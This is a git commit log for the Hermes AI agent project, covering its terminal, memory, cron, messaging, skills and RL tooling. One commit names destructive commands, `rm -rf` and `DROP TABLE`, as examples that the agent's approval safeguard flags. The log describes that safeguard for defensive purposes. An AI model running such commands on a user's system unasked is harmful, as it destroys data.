teknium1	7cb6427dea	refactor: streamline cron job handling and update CLI commands - Removed legacy cron daemon functionality, integrating cron job execution directly into the gateway process for improved efficiency. - Updated CLI commands to reflect changes, replacing `hermes cron daemon` with `hermes cron status` and enhancing documentation for cron job management. - Clarified messaging in the README and other documentation regarding the gateway's role in managing cron jobs. - Removed obsolete terminal_hecate tool and related configurations to simplify the codebase.	2026-02-21 16:21:19 -08:00
teknium1	79b62497d1	enable cronjobs in messaging platforms	2026-02-21 12:46:18 -08:00
teknium1	0729ef7353	fix: refine environment creation condition in terminal_tool - Updated the environment creation condition to specifically check for "singularity" instead of allowing "local", ensuring more precise handling of environment types during task execution.	2026-02-21 12:43:56 -08:00
teknium1	8f6788474b	feat: enhance logging in AIAgent for quiet mode - Added functionality to suppress logging noise from specific modules when in quiet mode, improving user experience in CLI. - Updated terminal_tool.py to change the log level for fallback directory usage from warning to debug, providing clearer context without cluttering logs.	2026-02-21 12:41:05 -08:00
teknium1	c98ee98525	feat: implement interactive prompts for sudo password and command approval in CLI - Added methods for handling sudo password and dangerous command approval prompts using a callback mechanism in cli.py. - Integrated these prompts with the prompt_toolkit UI for improved user experience. - Updated terminal_tool.py to support callback registration for interactive prompts, enhancing the CLI's interactivity. - Introduced a background thread for API calls in run_agent.py to allow for interrupt handling during long-running operations. - Enhanced error handling for interrupted API calls, ensuring graceful degradation of user experience.	2026-02-21 12:15:40 -08:00
teknium1	7ee7221af1	refactor: consolidate debug logging across tools with shared DebugSession class - Introduced a new DebugSession class in tools/debug_helpers.py to centralize debug logging functionality, replacing duplicated code across various tool modules. - Updated image_generation_tool.py, mixture_of_agents_tool.py, vision_tools.py, web_tools.py, and others to utilize the new DebugSession for logging tool calls and saving debug logs. - Enhanced maintainability and consistency in debug logging practices across the codebase.	2026-02-21 03:53:24 -08:00
teknium1	748fd3db88	refactor: enhance error handling with structured logging across multiple modules - Updated various modules including cli.py, run_agent.py, gateway, and tools to replace silent exception handling with structured logging. - Improved error messages to provide more context, aiding in debugging and monitoring. - Ensured consistent logging practices throughout the codebase, enhancing traceability and maintainability.	2026-02-21 03:32:11 -08:00
teknium1	a885d2f240	refactor: implement structured logging across multiple modules - Introduced logging functionality in cli.py, run_agent.py, scheduler.py, and various tool modules to replace print statements with structured logging. - Enhanced error handling and informational messages to improve debugging and monitoring capabilities. - Ensured consistent logging practices across the codebase, facilitating better traceability and maintenance.	2026-02-21 03:11:11 -08:00
teknium1	b6247b71b5	refactor: update tool descriptions for clarity and conciseness - Revised descriptions for various tools in model_tools.py, browser_tool.py, code_execution_tool.py, delegate_tool.py, and terminal_tool.py to enhance clarity and reduce verbosity. - Improved consistency in terminology and formatting across tool descriptions, ensuring users have a clearer understanding of tool functionalities and usage.	2026-02-21 02:41:30 -08:00
teknium1	a54a27595b	fix: update browser command connection instructions to prevent session conflicts - Clarified the usage of the --cdp flag when connecting to an existing Browserbase session. - Emphasized the importance of not using --session with --cdp to avoid creating a local browser instance in agent-browser >=0.13. - Updated comments to reflect changes in per-task isolation management with AGENT_BROWSER_SOCKET_DIR.	2026-02-21 00:54:01 -08:00
teknium1	7283b9f6cf	feat: extend browser session management with improved thread safety and timeout configuration - Increased the default session inactivity timeout from 2 to 5 minutes to accommodate LLM reasoning during multi-step tasks. - Enhanced thread safety by implementing locks around session activity tracking and cleanup processes, allowing concurrent access by multiple subagents. - Removed the stale daemon cleanup function, as it is no longer necessary with the updated session management approach. - Updated logging and session cleanup logic to ensure proper handling of active sessions and associated resources.	2026-02-21 00:44:25 -08:00
teknium1	5b3f708fcb	feat: enhance stale daemon cleanup and improve error logging in browser tool - Updated the stale daemon cleanup function to support multiple patterns for identifying orphaned agent-browser processes, improving reliability across different versions. - Added logging for stderr output during browser command execution to aid in diagnostics, particularly for capturing warnings from the agent-browser. - Implemented a warning for empty snapshots returned from the agent-browser, indicating potential issues with stale daemons or CDP connections.	2026-02-21 00:27:35 -08:00
teknium1	c48817f69b	chore: update agent-browser dependency and clean up stale daemon processes - Upgraded the agent-browser dependency from version 0.7.6 to 0.13.0 in package.json. - Added functionality to kill stale agent-browser daemon processes in browser_tool.py to prevent orphaned instances from previous runs.	2026-02-20 23:40:42 -08:00
teknium1	70dd3a16dc	Cleanup time!	2026-02-20 23:23:32 -08:00
teknium1	630bd3d789	feat: improve password prompt handling in terminal tool - Replaced getpass with direct reading from /dev/tty to enhance password input handling without echoing. - Updated threading logic for password input to ensure proper cleanup and error handling. - Improved visual feedback during password prompt, including clearer separation and timeout messaging. - Enhanced user experience by providing immediate feedback on password input status.	2026-02-20 21:26:31 -08:00
teknium1	ba07d9d5e3	feat: enhance task delegation with spinner updates and progress display - Added a spinner to visually indicate task delegation progress in quiet mode, improving user experience during batch processing. - Implemented a method to update spinner text dynamically based on remaining tasks, providing real-time feedback. - Enhanced the `delegate_task` function to include per-task completion messages, ensuring clarity on task status during execution. - Updated the KawaiiSpinner class to allow message updates while running, facilitating better interaction during long-running tasks.	2026-02-20 03:23:23 -08:00
teknium1	90e5211128	feat: implement subagent delegation for task management - Introduced the `delegate_task` tool, allowing the main agent to spawn child AIAgent instances with isolated context for complex tasks. - Supported both single-task and batch processing (up to 3 concurrent tasks) to enhance task management capabilities. - Updated configuration options for delegation, including maximum iterations and default toolsets for subagents. - Enhanced documentation to provide clear guidance on using the delegation feature and its configuration. - Added comprehensive tests to ensure the functionality and reliability of the delegation logic.	2026-02-20 03:15:53 -08:00
teknium1	c0d412a736	refactor: update search tool parameters and documentation for clarity - Changed the target parameter from "content" and "files" to "grep" and "find" to better represent their functionality. - Revised descriptions in the tool definitions and execution code schema to enhance understanding of search modes and output formats. - Ensured consistency in the handling of search operations across the codebase.	2026-02-20 02:46:30 -08:00
teknium1	f9eb5edb96	refactor: rename search tool for clarity and consistency - Updated the tool name from "search" to "search_files" across multiple files to better reflect its functionality. - Adjusted related documentation and descriptions to ensure clarity in usage and expected behavior. - Enhanced the toolset definitions and mappings to incorporate the new naming convention, improving overall consistency in the codebase.	2026-02-20 02:43:57 -08:00
teknium1	ba8b80a163	refactor: improve memory entry handling and file operations - Replaced file locking with atomic file operations using temporary files to prevent race conditions during read/write. - Added deduplication of memory and user entries to avoid exact duplicates in the memory store. - Enhanced error handling for duplicate entries and improved logic for managing multiple matches in memory operations. - Updated docstrings to clarify the behavior of file reading and writing methods, ensuring better understanding of the implementation.	2026-02-20 02:32:15 -08:00
teknium1	3b90fa5c9b	fix: increase default timeout for code execution sandbox - Updated the default timeout for sandbox script execution from 120 seconds to 300 seconds (5 minutes) to allow longer-running scripts. - Enhanced comments in the code execution tool to clarify the timeout duration. - Suppressed stdout and stderr output from internal tool handlers during execution to prevent clutter in the CLI interface.	2026-02-20 01:29:53 -08:00
teknium1	273b367f05	fix: update documentation and return types for web tools - Revised docstrings for `web_search` and `web_extract` functions to clarify return types and structure. - Updated the execution code schema documentation to reflect changes in the output format for both tools, ensuring consistency and improved understanding for users.	2026-02-19 23:30:01 -08:00
teknium1	783acd712d	feat: implement code execution sandbox for programmatic tool calling - Introduced a new `execute_code` tool that allows the agent to run Python scripts that call Hermes tools via RPC, reducing the number of round trips required for tool interactions. - Added configuration options for timeout and maximum tool calls in the sandbox environment. - Updated the toolset definitions to include the new code execution capabilities, ensuring integration across platforms. - Implemented comprehensive tests for the code execution sandbox, covering various scenarios including tool call limits and error handling. - Enhanced the CLI and documentation to reflect the new functionality, providing users with clear guidance on using the code execution tool.	2026-02-19 23:23:43 -08:00
teknium1	9350e26e68	feat: introduce clarifying questions tool for interactive user engagement - Added a new `clarify_tool` to enable the agent to ask structured multiple-choice or open-ended questions to users. - Implemented callback functionality for user interaction, allowing the platform to handle UI presentation. - Updated the CLI and agent to support clarify questions, including timeout handling and response management. - Enhanced toolset definitions and requirements to include the clarify tool, ensuring availability across platforms.	2026-02-19 20:06:14 -08:00
teknium1	4d5f29c74c	feat: introduce skill management tool for agent-created skills and skills migration to ~/.hermes - Added a new `skill_manager_tool` to enable agents to create, update, and delete their own skills, enhancing procedural memory capabilities. - Updated the skills directory structure to support user-created skills in `~/.hermes/skills/`, allowing for better organization and management. - Enhanced the CLI and documentation to reflect the new skill management functionalities, including detailed instructions on creating and modifying skills. - Implemented a manifest-based syncing mechanism for bundled skills to ensure user modifications are preserved during updates.	2026-02-19 18:25:53 -08:00
teknium1	d070b8698d	fix: escape file glob patterns in ShellFileOperations - Updated the file glob and include filters in the ShellFileOperations class to escape shell arguments, preventing unintended shell expansion. - Added comments to clarify the necessity of quoting for file glob patterns.	2026-02-19 15:12:02 -08:00
teknium1	057d3e1810	feat: enhance search functionality in ShellFileOperations - Updated the `_search_with_rg` and `_search_with_grep` methods to include filename in the output and improve result handling. - Adjusted result fetching to account for context lines, ensuring accurate total counts and pagination. - Enhanced parsing logic for matches and context lines, improving the accuracy of search results. - Refactored result slicing to maintain consistency across output modes, ensuring users receive the correct number of results.	2026-02-19 15:10:17 -08:00
teknium1	d49af633f0	feat: enhance command execution with stdin support - Modified the `_exec` method in `ShellFileOperations` to accept `stdin_data`, allowing large content to be piped directly to commands, bypassing ARG_MAX limitations. - Updated the `execute` method in various environment classes (`_LocalEnvironment`, `_SingularityEnvironment`, `_SSHEnvironment`, `_DockerEnvironment`) to support `stdin_data`, improving command execution flexibility. - Removed the unique marker generation for heredoc in favor of direct stdin piping, simplifying file writing operations and enhancing performance for large files.	2026-02-19 14:50:51 -08:00
teknium1	4f57d7116d	Improved stdout handling in the terminal tool to prevent deadlocks by implementing a background thread to continuously drain output, ensuring smooth command execution without blocking.	2026-02-19 09:26:31 -08:00
teknium1	56ee8a5cc6	refactor: remove 'read' action from memory tool and agent logging - Eliminated the 'read' action from the memory tool and related logging in the agent, streamlining the available actions to 'add', 'replace', and 'remove'. - Updated error messages and documentation to reflect the removal of the 'read' action, ensuring clarity in the API's usage.	2026-02-19 01:03:08 -08:00
teknium1	440c244cac	feat: add persistent memory system + SQLite session store Two-part implementation: Part A - Curated Bounded Memory: - New memory tool (tools/memory_tool.py) with MEMORY.md + USER.md stores - Character-limited (2200/1375 chars), § delimited entries - Frozen snapshot injected into system prompt at session start - Model manages pruning via replace/remove with substring matching - Usage indicator shown in system prompt header Part B - SQLite Session Store: - New hermes_state.py with SessionDB class, FTS5 full-text search - Gateway session.py rewritten to dual-write SQLite + legacy JSONL - Compression-triggered session splitting with parent_session_id chains - New session_search tool with Gemini Flash summarization of matched sessions - CLI session lifecycle (create on launch, close on exit) Also: - System prompt now cached per session, only rebuilt on compression (fixes prefix cache invalidation from date/time changes every turn) - Config version bumped to 3, hermes doctor checks for new artifacts - Disabled in batch_runner and RL environments	2026-02-19 00:57:31 -08:00
teknium1	14e59706b7	Add Skills Hub — universal skill search, install, and management from online registries Implements the Hermes Skills Hub with agentskills.io spec compliance, multi-registry skill discovery, security scanning, and user-driven management via CLI and /skills slash command. Core features: - Security scanner (tools/skills_guard.py): 120 threat patterns across 12 categories, trust-aware install policy (builtin/trusted/community), structural checks, unicode injection detection, LLM audit pass - Hub client (tools/skills_hub.py): GitHub, ClawHub, Claude Code marketplace, and LobeHub source adapters with shared GitHubAuth (PAT + gh CLI + GitHub App), lock file provenance tracking, quarantine flow, and unified search across all sources - CLI interface (hermes_cli/skills_hub.py): search, install, inspect, list, audit, uninstall, publish (GitHub PR), snapshot export/import, and tap management — powers both `hermes skills` and `/skills` Spec conformance (Phase 0): - Upgraded frontmatter parser to yaml.safe_load with fallback - Migrated 39 SKILL.md files: tags/related_skills to metadata.hermes.* - Added assets/ directory support and compatibility/metadata fields - Excluded .hub/ from skill discovery in skills_tool.py Updated 13 config/doc files including README, AGENTS.md, .env.example, setup wizard, doctor, status, pyproject.toml, and docs.	2026-02-18 16:09:05 -08:00
teknium1	e184f5ab3a	Add todo tool for agent task planning and management Single `todo` tool that reads (no params) or writes (provide todos array with merge flag). In-memory TodoStore on AIAgent, no system prompt mutation, behavioral guidance in tool description only. State re-injected after context compression events. Gateway sessions hydrate from conversation history. Added to all platform toolsets. Also wired into RL agent_loop.py with per-run TodoStore and fixed browser_snapshot user_task passthrough from first user message.	2026-02-17 17:02:33 -08:00
teknium1	ec59d71e60	Update PTY write handling in ProcessRegistry to ensure data is encoded as bytes before writing. This change improves compatibility with string inputs and clarifies the expected data type in comments.	2026-02-17 03:14:47 -08:00
teknium1	bdac541d1e	Rename OPENAI_API_KEY to HERMES_OPENAI_API_KEY in configuration and codebase for clarity and to avoid conflicts. Update related documentation and error messages to reflect the new key name, ensuring backward compatibility with existing setups.	2026-02-17 03:11:17 -08:00
teknium1	061fa70907	Add background process management with process tool, wait, PTY, and stdin support New process registry and tool for managing long-running background processes across all terminal backends (local, Docker, Singularity, Modal, SSH). Process Registry (tools/process_registry.py): - ProcessSession tracking with rolling 200KB output buffer - spawn_local() with optional PTY via ptyprocess for interactive CLIs - spawn_via_env() for non-local backends (runs inside sandbox, never on host) - Background reader threads per process (Popen stdout or PTY) - wait() with timeout clamping, interrupt support, and transparent limit reporting - JSON checkpoint to ~/.hermes/processes.json for gateway crash recovery - Module-level singleton shared across agent loop, gateway, and RL Process Tool (model_tools.py): - 7 actions: list, poll, log, wait, kill, write, submit - Paired with terminal in all toolsets (CLI, messaging, RL) - Timeout clamping with transparent notes in response Terminal Tool Updates (tools/terminal_tool.py): - Replaced nohup background mode with registry spawn (returns session_id) - Added workdir parameter for per-command working directory - Added check_interval parameter for gateway auto-check watchers - Added pty parameter for interactive CLI tools (Codex, Claude Code) - Updated TERMINAL_TOOL_DESCRIPTION with full background workflow docs - Cleanup thread now respects active background processes (won't reap sandbox) Gateway Integration (gateway/run.py, session.py, config.py): - Session reset protection: sessions with active processes exempt from reset - Default idle timeout increased from 2 hours to 24 hours - from_dict fallback aligned to match (was 120, now 1440) - session_key env var propagated to process registry for session mapping - Crash recovery on gateway startup via checkpoint probe - check_interval watcher: asyncio task polls process, delivers updates to platform RL Safety (environments/): - tool_context.py cleanup() kills background processes on episode end - hermes_base_env.py warns when enabled_toolsets is None (loads all tools) - Process tool safe in RL via wait() blocking the agent loop Also: - Added ptyprocess as optional dependency (in pyproject.toml [pty] extra + [all]) - Fixed pre-existing bug: rl_test_inference missing from TOOL_TO_TOOLSET_MAP - Updated AGENTS.md with process management docs and project structure - Updated README.md terminal section with process management overview	2026-02-17 02:51:31 -08:00
teknium1	c33feb6dc9	Fix host CWD leaking into non-local terminal backends When using Modal, Docker, SSH, or Singularity as the terminal backend from the CLI, the agent resolved cwd: "." to the host machine's local path (e.g. /Users/rewbs/code/hermes-agent) and passed it to the remote sandbox, where it doesn't exist. All commands failed with "No such file or directory". Root cause: cli.py unconditionally resolved "." to os.getcwd() and wrote it to TERMINAL_CWD regardless of backend type. Every tool then used that host-local path as the working directory inside the remote environment. Fixes: - cli.py: only resolve "." to os.getcwd() for the local backend. For all remote backends (ssh, docker, modal, singularity), leave TERMINAL_CWD unset so the tool layer uses per-backend defaults (/root, /, ~, etc.) - terminal_tool.py: added sanity check -- if TERMINAL_CWD contains a host-local prefix (/Users/, /home/, C:\) for a non-local backend, log a warning and fall back to the backend's default - terminal_tool.py: SSH default CWD is now ~ instead of os.getcwd() - file_operations.py: last-resort CWD fallback changed from os.getcwd() to "/" so host paths never leak into remote file operations	2026-02-16 22:30:04 -08:00
teknium1	8117d0adab	Refactor file operations and environment management in file_tools and terminal_tool - Improved the caching mechanism for ShellFileOperations to ensure stale entries are invalidated when environments are cleaned up. - Enhanced thread safety by refining the use of locks during environment creation and cleanup processes. - Streamlined the cleanup of inactive environments to prevent blocking other tool calls, ensuring efficient resource management. - Added error handling and messaging improvements for better user feedback during environment cleanup.	2026-02-16 19:37:40 -08:00
teknium1	01a3a6ab0d	Implement cleanup guard to prevent multiple executions on exit - Introduced a new cleanup function that ensures terminal and browser sessions are cleaned up only once during application exit. - Updated atexit registration to use the new cleanup function, enhancing resource management and preventing potential issues from multiple cleanup calls. - Modified terminal cleanup messaging to only display when environments are cleaned, improving user feedback.	2026-02-16 02:43:45 -08:00
teknium1	69aa35a51c	Add messaging platform enhancements: STT, stickers, Discord UX, Slack, pairing, hooks Major feature additions inspired by OpenClaw/ClawdBot integration analysis: Voice Message Transcription (STT): - Auto-transcribe voice/audio messages via OpenAI Whisper API - Download voice to ~/.hermes/audio_cache/ on Telegram/Discord/WhatsApp - Inject transcript as text so all models can understand voice input - Configurable model (whisper-1, gpt-4o-mini-transcribe, gpt-4o-transcribe) Telegram Sticker Understanding: - Describe static stickers via vision tool with JSON-backed cache - Cache keyed by file_unique_id avoids redundant API calls - Animated/video stickers get emoji-based fallback description Discord Rich UX: - Native slash commands (/ask, /reset, /status, /stop) via app_commands - Button-based exec approvals (Allow Once / Always Allow / Deny) - ExecApprovalView with user authorization and timeout handling Slack Integration: - Full SlackAdapter using slack-bolt with Socket Mode - DMs, channel messages (mention-gated), /hermes slash command - File attachment handling with bot-token-authenticated downloads DM Pairing System: - Code-based user authorization as alternative to static allowlists - 8-char codes from unambiguous alphabet, 1-hour expiry - Rate limiting, lockout after failed attempts, chmod 0600 on data - CLI: hermes pairing list/approve/revoke/clear-pending Event Hook System: - File-based hook discovery from ~/.hermes/hooks/ - HOOK.yaml + handler.py per hook, sync/async handler support - Events: gateway:startup, session:start/reset, agent:start/step/end - Wildcard matching (command:* catches all command events) Cross-Channel Messaging: - send_message agent tool for delivering to any connected platform - Enables cron job delivery and cross-platform notifications Human-Like Response Pacing: - Configurable delays between message chunks (off/natural/custom) - HERMES_HUMAN_DELAY_MODE env var with min/max ms settings Warm Injection Message Style: - Retrofitted image vision messages with friendly kawaii-consistent tone - All new injection messages (STT, stickers, errors) use warm style Also: updated config migration to prompt for optional keys interactively, bumped config version, updated README, AGENTS.md, .env.example, cli-config.yaml.example, install scripts, pyproject.toml, and toolsets.	2026-02-15 21:38:59 -08:00
teknium1	5404a8fcd8	Enhance image handling and analysis capabilities across platforms - Updated the vision tool to accept both HTTP/HTTPS URLs and local file paths for image analysis. - Implemented caching of user-uploaded images in local directories to ensure reliable access for the vision tool, addressing issues with ephemeral URLs. - Enhanced platform adapters (Discord, Telegram, WhatsApp) to download and cache images, allowing for immediate analysis and enriched message context. - Added a new method to auto-analyze images attached by users, enriching the conversation with detailed descriptions. - Improved documentation for image handling processes and updated related functions for clarity and efficiency.	2026-02-15 16:10:50 -08:00
teknium1	ff9ea6c4b1	Enhance TTS tool to support platform-specific audio formats - Added detection of the platform from the environment variable to determine the appropriate audio output format. - Implemented logic to output Opus (.ogg) files for Telegram when using compatible TTS providers, while defaulting to MP3 for others.	2026-02-14 16:13:26 -08:00
teknium1	f5be6177b2	Add Text-to-Speech (TTS) functionality with multiple providers Add tool previews Add AGENTS and SOUL.md support Add Exec Approval	2026-02-12 10:05:08 -08:00
teknium	f23856df8e	Add kill_modal script to manage Modal applications and better handling of file and terminal tools - Introduced a new script, `kill_modal.sh`, to facilitate stopping running Modal apps, including the ability to stop all apps or specific swe-rex sandboxes. - Enhanced user experience with clear usage instructions and feedback during the stopping process. - Improved error handling to ensure smooth execution even if some apps fail to stop.	2026-02-12 05:37:14 +00:00
teknium1	153cd5bb44	Refactor skills tool integration and enhance system prompt - Removed the skills_categories tool from the skills toolset, streamlining the skills functionality to focus on skills_list and skill_view. - Updated the system prompt to dynamically build a compact skills index, allowing the model to quickly reference available skills without additional tool calls. - Cleaned up related code and documentation to reflect the removal of skills_categories, ensuring clarity and consistency across the codebase.	2026-02-10 19:48:38 -08:00
teknium1	cfe2f3fe15	Implement interrupt handling for long-running tool executions in AIAgent - Added functionality to signal and terminate long-running terminal commands when a new user message is received, allowing for immediate agent response. - Introduced a global interrupt event in the terminal tool to facilitate early termination of subprocesses. - Updated the AIAgent class to handle interrupts gracefully, ensuring that remaining tool calls are skipped and appropriate messages are returned to maintain valid message sequences.	2026-02-10 16:34:27 -08:00
teknium	999a28062d	Implement graceful exit cleanup for terminal tool - Added a new `_atexit_cleanup` function to handle cleanup of active environments and stop the cleanup thread upon program exit. - Enhanced logging to inform users about the number of remaining sandboxes being shut down during cleanup.	2026-02-10 22:53:44 +00:00
teknium	35ad3146a8	Add new environments and enhance tool context functionality - Introduced new environments: Terminal Test Environment and SWE Environment, each with default configurations for testing and software engineering tasks. - Added TerminalBench 2.0 evaluation environment with comprehensive setup for agentic LLMs, including task execution and verification. - Enhanced ToolContext with methods for uploading and downloading files, ensuring binary-safe operations. - Updated documentation across environments to reflect new features and usage instructions. - Refactored existing environment configurations for consistency and clarity.	2026-02-10 19:39:05 +00:00
teknium	e8343f2d87	Refactor Singularity environment for persistent container management - Updated the _SingularityEnvironment class to utilize a persistent Apptainer instance, allowing state (files, installs, environment changes) to persist across commands. - Enhanced the initialization process to start a background instance with full isolation and writable filesystem. - Modified the execute method to connect to the running instance, ensuring commands run within the same container context. - Implemented cleanup functionality to stop the persistent instance on cleanup or destruction, improving resource management. - Updated class documentation to reflect new features and usage of the persistent environment.	2026-02-10 06:49:58 +00:00
teknium	7a11be9f3f	Enhance browser tool functionality and cleanup process - Added checks for local installation of the agent-browser CLI in the `_find_agent_browser` function, improving installation guidance. - Implemented per-task socket directory management in `_run_browser_command` to prevent concurrency issues. - Updated `cleanup_browser` to remove per-task socket directories, ensuring proper resource cleanup after task completion. - Refactored comments for clarity and improved documentation throughout the browser tool code.	2026-02-09 04:36:37 +00:00
teknium1	c441681dc2	Update default model to 'anthropic/claude-opus-4.6' and refine terminal working directory settings - Changed the default LLM model in the setup wizard and example environment file to 'anthropic/claude-opus-4.6'. - Updated terminal working directory settings in CLI and related files to use the current directory ('.') instead of '/tmp'. - Enhanced documentation comments for clarity on terminal configuration and working directory behavior.	2026-02-08 12:56:40 -08:00
teknium	d999d9876d	Enhance async tool execution and error handling in Hermes agent for Atropos integration - Updated `.gitignore` to exclude `testlogs` directory. - Refactored `handle_web_function_call` in `model_tools.py` to support running async functions in existing event loops, improving compatibility with Atropos. - Introduced a thread pool executor in `agent_loop.py` for running synchronous tool calls that internally use `asyncio.run()`, preventing deadlocks. - Added `ToolError` class to track tool execution errors, enhancing error reporting during agent loops. - Updated `wandb_log` method in `hermes_base_env.py` to log tool error statistics for better monitoring. - Implemented patches in `patches.py` to ensure async-safe operation of tools within Atropos's event loop. - Enhanced `ToolContext` and `terminal_tool.py` to utilize the new async handling, improving overall tool execution reliability.	2026-02-08 05:00:47 +00:00
teknium	ac79725923	Update dependencies and enhance installation scripts - Added `prompt_toolkit` as a direct dependency for interactive CLI support. - Updated `modal` optional dependency to require `swe-rex[modal]>=1.4.0` for improved cloud execution capabilities. - Enhanced `messaging` optional dependencies to include `aiohttp>=3.9.0` for WhatsApp bridge communication. - Refined installation scripts to check for Python version requirements, emphasizing the need for Python 3.11+ for RL training tools. - Improved setup scripts to ensure proper installation of submodules and dependencies, enhancing user experience during setup.	2026-02-07 00:05:04 +00:00
teknium1	533c064269	Add file manipulation tools and enhance setup scripts - Introduced file manipulation capabilities in `model_tools.py`, including functions for reading, writing, patching, and searching files. - Added a new `file` toolset in `toolsets.py` and updated distributions to include file tools. - Enhanced `setup-hermes.sh` and `install.sh` scripts to check for and optionally install `ripgrep` for faster file searching. - Implemented a new `file_operations.py` module to encapsulate file operations using shell commands. - Updated `doctor.py` and `install.ps1` to check for `ripgrep` and provide installation guidance if not found. - Added fuzzy matching and patch parsing capabilities to improve file manipulation accuracy and flexibility.	2026-02-05 03:49:46 -08:00
teknium1	5c3105b437	Enhance RL test inference with WandB integration and real-time output streaming - Added unique run ID generation for WandB tracking during test inference. - Enabled WandB usage for test tracking and updated command-line arguments accordingly. - Implemented real-time output streaming for process execution, improving log visibility and debugging. - Enhanced error handling to display last few lines of stderr for better troubleshooting.	2026-02-04 21:07:07 -08:00
teknium1	3c0d0dba49	Update RL tools and enhance configuration management - Modified `model_tools.py` to update default model IDs and add new RL function `rl_test_inference`. - Enhanced `README.md` with installation instructions for submodules and updated API key usage. - Improved `rl_cli.py` to load configuration from `~/.hermes/config.yaml` and set terminal working directory for RL tools. - Updated `run_agent.py` to handle empty string arguments as empty objects for better JSON validation. - Refined installation scripts to ensure submodules are cloned and installed correctly, enhancing setup experience.	2026-02-04 13:57:59 -08:00
teknium1	12bbca95ec	Add tinker-atropos submodule and update RL training tools - Added the tinker-atropos submodule for enhanced RL training capabilities. - Updated model_tools.py to reorder RL function definitions and improve descriptions. - Modified rl_cli.py to include checks for the tinker-atropos setup and provide user guidance. - Adjusted toolsets.py and __init__.py to reflect changes in RL function availability. - Enhanced rl_training_tool.py to manage training processes directly without a separate API server.	2026-02-04 10:36:01 -08:00
teknium1	f6574978de	Add RL training configuration and tools - Updated `.env.example` to include Tinker and WandB API keys for reinforcement learning training. - Enhanced `model_tools.py` to clarify configuration options and streamline the RL training process. - Expanded `README.md` with detailed instructions for setting up RL training using Tinker and WandB. - Modified `hermes_cli` files to integrate RL training tools and ensure proper configuration checks. - Improved `rl_training_tool.py` to reflect changes in training parameters and configuration management.	2026-02-04 09:36:51 -08:00
teknium1	f018999da9	initial RL training tools and loop	2026-02-03 23:41:26 -08:00
teknium1	212460289b	Enhance skills tool to have an arg so it is more reliably called, and error handling in agent - Updated the `skills_categories` function to include a `verbose` parameter, allowing users to request skill counts per category. - Modified the `handle_skills_function_call` method to pass the `verbose` argument to `skills_categories`. - Improved error handling in the `AIAgent` class by injecting a recovery message when invalid JSON arguments are detected, guiding users on how to correct their tool calls. - Enhanced the `GatewayRunner` to return a user-friendly error message if the agent fails to generate a final response, improving overall user experience.	2026-02-03 15:26:59 -08:00
teknium1	5d3398aa8a	Refactor terminal tool command approval process and enhance CLI feedback - Updated the terminal tool's command approval flow to improve user interaction when executing potentially dangerous commands, replacing the previous confirmation method with a clear explanation and instructions for adding commands to the allowlist. - Removed the internal `force` parameter from the model API, ensuring that dangerous command approvals are handled solely through user prompts. - Enhanced the CLI to provide better feedback regarding tool availability, including improved messaging for enabled and disabled toolsets. - Updated AGENTS.md to reflect changes in the command approval process and configuration instructions.	2026-02-02 23:46:41 -08:00
teknium1	76d929e177	Implement dangerous command approval system for terminal tool - Added a safety mechanism to detect and approve potentially dangerous commands (e.g., `rm -rf`, `DROP TABLE`). - Introduced an approval flow for local/SSH backends, prompting users for confirmation with options to allow once, for the session, or permanently. - Updated configuration to include a `command_allowlist` for storing approved patterns. - Enhanced messaging for sudo failures in messaging contexts. - Updated relevant documentation in AGENTS.md and TODO.md to reflect these changes.	2026-02-02 23:35:18 -08:00
teknium1	3488576bd8	Update terminal configuration and enhance CLI model management - Changed default Docker, Singularity, and Modal images in configuration files to use "nikolaik/python-nodejs:python3.11-nodejs20" for improved compatibility. - Updated the default model in the configuration to "anthropic/claude-sonnet-4.5" and adjusted related setup prompts for API provider configuration. - Introduced a new CLI option for selecting a custom OpenAI-compatible endpoint, enhancing flexibility in model provider setup. - Enhanced the prompt choice functionality to support arrow key navigation for better user experience in CLI interactions. - Updated documentation in relevant files to reflect these changes and improve user guidance.	2026-02-02 19:13:41 -08:00
teknium1	619c72e566	Enhance CLI with multi-platform messaging integration and configuration management - Updated CLI to load configuration from user-specific and project-specific YAML files, prioritizing user settings. - Introduced a new command `/platforms` to display the status of connected messaging platforms (Telegram, Discord, WhatsApp). - Implemented a gateway system for handling messaging interactions, including session management and delivery routing for cron job outputs. - Added support for environment variable configuration and a dedicated gateway configuration file for advanced settings. - Enhanced documentation in README.md and added a new messaging.md file to guide users on platform integrations and setup. - Updated toolsets to include platform-specific capabilities for Telegram, Discord, and WhatsApp, ensuring secure and tailored interactions.	2026-02-02 19:01:51 -08:00
teknium1	a3ba41fce2	Implement cron job management system for scheduled tasks (similar to OpenAI's Pulse but the AI can also schedule jobs) - Introduced a new cron job system allowing users to schedule automated tasks via the CLI, supporting one-time reminders and recurring jobs. - Added commands for managing cron jobs: `/cron` to list jobs, `/cron add` to create new jobs, and `/cron remove` to delete jobs. - Implemented job storage in `~/.hermes/cron/jobs.json` with output saved to `~/.hermes/cron/output/{job_id}/{timestamp}.md`. - Enhanced the CLI and README documentation to include detailed usage instructions and examples for cron job management. - Integrated cron job tools into the hermes-cli toolset, ensuring they are only available in interactive CLI mode. - Added support for cron expression parsing with the `croniter` package, enabling flexible scheduling options.	2026-02-02 08:26:42 -08:00
teknium1	bbeed5b5d1	Enhance session logging and interactive sudo support - Implemented automatic session logging, saving conversation trajectories to the `logs/` directory in JSON format, with each session having a unique identifier. - Updated the CLI to display the session ID in the welcome banner for easy reference. - Introduced an interactive sudo password prompt in CLI mode, allowing users to enter their password with a 45-second timeout, enhancing user experience during command execution. - Documented session logging and interactive sudo features in `README.md`, `cli.md`, and `cli-config.yaml.example` for better user guidance.	2026-02-01 15:36:26 -08:00
teknium1	971ed2bbdf	Implement sudo support across terminal environments - Added support for sudo commands in local, Docker, Singularity, and SSH environments by introducing the `SUDO_PASSWORD` environment variable. - Updated terminal tool configurations in `.env.example` and `cli-config.yaml.example` to document the new sudo functionality. - Enhanced the command execution process to handle sudo commands gracefully, preventing hangs on interactive prompts and providing clear error messages when no password is configured. - Updated `README.md` to include instructions for using sudo support and SSH backend configuration. - Revised `TODO.md` to reflect the completion of the sudo feature and outline future enhancements.	2026-02-01 10:02:34 -08:00
teknium1	8f5f99c22a	Add new skills descriptions and enhance skills tool functionality - Added detailed descriptions for new skills categories: Machine Learning Operations and Note Taking. - Introduced a new Obsidian skill with commands for reading, listing, searching, creating, and appending notes. - Enhanced the skills tool to load and display category descriptions from DESCRIPTION.md files, improving user guidance and discovery of available skills.	2026-02-01 01:32:21 -08:00
